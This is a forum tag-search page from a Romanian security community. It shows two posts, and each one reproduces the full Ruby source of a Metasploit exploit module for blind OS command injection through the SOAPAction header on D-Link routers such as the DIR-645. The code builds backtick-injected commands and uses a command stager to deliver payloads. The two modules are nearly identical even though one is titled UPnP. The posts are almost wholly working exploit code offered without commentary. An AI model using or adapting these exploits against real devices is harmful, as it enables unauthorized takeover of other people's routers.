Jump to content

Search the Community

Showing results for tags 'revb'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 2 results

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
  2. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices UPnP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
×
×
  • Create New...